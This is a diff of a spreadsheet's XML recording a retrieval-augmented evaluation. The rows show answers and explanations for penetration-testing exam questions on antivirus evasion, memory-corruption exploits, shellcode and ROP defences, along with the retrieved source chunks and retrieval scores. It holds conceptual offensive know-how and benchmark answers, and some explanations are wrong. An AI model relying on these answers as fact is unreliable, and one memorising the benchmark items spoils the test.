 preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I77" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J77" t="n">
@@ -5588,7 +5589,7 @@
       </c>
       <c r="K77" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5623,7 +5624,7 @@
       <c r="F78" t="inlineStr">
         <is>
           <t>Answer: Encrypting the payload to evade signature-based detection
-Explanation: Encrypting the payload to evade signature-based detection is an effective method used by attackers to bypass static signature-based detection mechanisms in antivirus systems. By encrypting the contents of the malicious payload, its digital signature is altered, rendering traditional signature-based detection ineffective as the encryption changes the file's appearance to the defensive mechanisms without altering its functional behavior when decrypted after delivery. The other options, while plausible in different contexts, do not directly relate to evading static detection. Using ISO files is a method to distribute malware, not specifically to evade detection, and fast-flux DNS tackles IP address obfuscation for domain resolution, which concerns network-level tracking rather than file signature evasion. Changing the file hash by appending random data might initially seem effective, but this method often does not fundamentally alter the detectable patterns of malware code leveraged by more sophisticated antivirus systems that employ heuristic or behavior-based analysis.</t>
+Explanation: Encrypting the payload to evade signature-based detection is an effective method used by attackers to bypass static signature-based detection mechanisms in antivirus systems. By encrypting the contents of the malicious payload, its digital signature is altered, rendering traditional signature-based detection ineffective as the encryption changes the file's appearance to the defensive mechanisms without altering its functional behavior when decrypted after delivery. The other options, while plausible in different contexts, are generally easier for modern antiviruses to detect through heuristic or behavior-based analysis.</t>
         </is>
       </c>
       <c r="G78" t="inlineStr">
@@ -5634,20 +5635,20 @@
       <c r="H78" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 7ff70824-6194-4554-86fe-63aa3ae35f19, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 2ed8c0e8-d43e-4d09-a902-9e44e6d56c0b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 2ed8c0e8-d43e-4d09-a902-9e44e6d56c0b, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 9)
+cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I78" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J78" t="n">
@@ -5655,7 +5656,7 @@
       </c>
       <c r="K78" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5707,14 +5708,14 @@
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I79" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J79" t="n">
@@ -5722,7 +5723,7 @@
       </c>
       <c r="K79" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5757,7 +5758,7 @@
       <c r="F80" t="inlineStr">
         <is>
           <t>Answer: Use-after-free vulnerability
-Explanation: A use-after-free vulnerability occurs when an application attempts to use memory after it has been freed, potentially allowing attackers to execute arbitrary code due to corrupt memory management. This vulnerability type provides a viable path for an attacker to introduce malevolent code into the application's process memory. A buffer overflow, while also related to improper memory management, typically involves overwriting memory boundaries. Cross-site scripting and SQL injection are incorrect as they are typically techniques found in malware.</t>
+Explanation: A use-after-free vulnerability occurs when an application attempts to use memory after it has been freed, potentially allowing attackers to execute arbitrary code due to corrupt memory management. This vulnerability type provides a viable path for an attacker to introduce malevolent code into the application's process memory. A buffer overflow, while also related to improper memory management, typically involves overwriting memory boundaries. Cross-site scripting and SQL injection are incorrect as they are typically found in malware.</t>
         </is>
       </c>
       <c r="G80" t="inlineStr">
@@ -5776,12 +5777,12 @@
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I80" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J80" t="n">
@@ -5789,7 +5790,7 @@
       </c>
       <c r="K80" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5838,17 +5839,17 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: c722d3b3-3a6b-4c5c-ab92-a795ce66e638, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: aadf4df9-3925-4bce-85a2-9df3030ade1e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: aadf4df9-3925-4bce-85a2-9df3030ade1e, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I81" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J81" t="n">
@@ -5856,7 +5857,7 @@
       </c>
       <c r="K81" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5891,7 +5892,7 @@
       <c r="F82" t="inlineStr">
         <is>
           <t>Answer: Stack-based buffer overflow
-Explanation: The scenario described is indicative of a stack-based buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. The failure to gain execution control despite the use of NOP sled techniques suggests that security mitigations such as Data Execution Prevention (DEP) or Address Space Layout Randomization (ASLR) are in place to prevent this type of attack. These built-in protections can make it more difficult for an attacker to exploit a buffer overflow vulnerability and gain control over the system. Integer overflow, format string vulnerability, and cross-site scripting are not directly related to the scenario described.</t>
+Explanation: The scenario described is indicative of a stack-based buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. The failure to gain execution control despite the use of NOP sled techniques suggests that security mitigations such as Data Execution Prevention (DEP) or Address Space Layout Randomization (ASLR) are in place to prevent this type of attack. These built-in protections can make it more difficult for an attacker to exploit a buffer overflow vulnerability and gain control over the system. Integer overflow and format string vulnerabilities, while related to handling of input data, do not typically result in crashes when excessively large inputs are fed into certain fields. Cross-site scripting (XSS) is a client-side web application vulnerability that does not control network traffic flow.</t>
         </is>
       </c>
       <c r="G82" t="inlineStr">
@@ -5904,18 +5905,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 1471cd95-4d3e-4fbe-8bd7-c8ddc9205b6a, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 7e72370b-7bc1-4835-8f62-1ca769eb5780, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I82" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J82" t="n">
@@ -5923,7 +5924,7 @@
       </c>
       <c r="K82" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -5970,19 +5971,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 206067af-6da5-4c4c-ab91-ab3ef496f54b, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I83" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J83" t="n">
@@ -5990,7 +5991,7 @@
       </c>
       <c r="K83" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6039,17 +6040,17 @@
 preemware_pentestingeval.pdf (Chunk: 28d10b6c-0649-4116-81ed-72fe66e40d18, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 2284c68d-f358-4abf-bedb-673c5c8ca0d7, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 6)
 cowWhySo-pentest-redteam-steering.md (Chunk: 11d98a52-b0af-474d-bbd1-38cbf4a246e7, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: eab6ace7-159e-4140-8209-e300bd81514c, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I84" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J84" t="n">
@@ -6057,7 +6058,7 @@
       </c>
       <c r="K84" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6107,7 +6108,7 @@
 preemware_pentestingeval.pdf (Chunk: 56fbf155-1ed2-4314-814d-07f041a2f2c5, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 9)
@@ -6116,7 +6117,7 @@
       </c>
       <c r="I85" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J85" t="n">
@@ -6124,7 +6125,7 @@
       </c>
       <c r="K85" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6171,19 +6172,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I86" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J86" t="n">
@@ -6191,7 +6192,7 @@
       </c>
       <c r="K86" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6237,20 +6238,20 @@
       <c r="H87" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I87" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J87" t="n">
@@ -6258,7 +6259,7 @@
       </c>
       <c r="K87" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6304,20 +6305,20 @@
       <c r="H88" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 15c58756-ef43-4c97-94a3-776946473168, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 15c58756-ef43-4c97-94a3-776946473168, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I88" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J88" t="n">
@@ -6325,7 +6326,7 @@
       </c>
       <c r="K88" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6360,7 +6361,7 @@
       <c r="F89" t="inlineStr">
         <is>
           <t>Answer: Shellcode injection via buffer overflow
-Explanation: Shellcode injection via buffer overflow is the most effective choice for achieving the goal stated in the question. This method uses a memory corruption error to run arbitrary code directly within the context of the application, which can be crafted to create backdoors or rootkits, thereby providing persistent and stealthy access. Cross-site scripting (XSS) exploitation primarily affects web applications and manipulates client-side scripts, which is less about maintaining long-term access to a host system. SQL injection is powerful for data exfiltration and sometimes initial access, but it does not naturally provide persistent host</t>
+Explanation: Shellcode injection via buffer overflow is the most effective choice for achieving the goal stated in the question. This method uses a memory corruption error to run arbitrary code directly within the context of the application, which can be crafted to create backdoors or rootkits, thereby providing persistent and stealthy access. Cross-site scripting (XSS) exploitation primarily affects web applications and manipulates client-side scripts, which is less about maintaining long-term access to a host system. SQL injection is powerful for data exfiltration and sometimes initial access, but it does not naturally provide persistent host access nor typically involve interaction with a victim's browser.</t>
         </is>
       </c>
       <c r="G89" t="inlineStr">
@@ -6378,13 +6379,13 @@
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I89" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J89" t="n">
@@ -6392,7 +6393,7 @@
       </c>
       <c r="K89" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6428,7 +6429,7 @@
       <c r="F90" t="inlineStr">
         <is>
           <t>Answer: Control Flow Integrity (CFI)
-Explanation: Control Flow Integrity (CFI) is specifically designed to protect systems against Return-Oriented Programming (ROP) attacks. CFI works by ensuring that the control flow graph (CFG) of a program, established at compile time, is adhered to, thus making exploitation through unexpected execution paths, such as those leveraged in ROP attacks, much more difficult. Stack canaries are used to prevent buffer overflow attacks by detecting changes to memory but do not specifically prevent ROP attacks where the control flow can be altered without necessarily triggering changes detected by stack canaries. Address Space Layout Randomization (ASLR) makes it harder for attackers to predict memory addresses, which does hinder ROP attacks but does not prevent them outright. Executable Space Protection is a general term referring to security mechanisms that restrict the execution of code in certain areas of memory, such as the stack or heap, and can be effective against some types of ROP attacks, but CFI is more specific and targeted at preventing ROP attacks directly.</t>
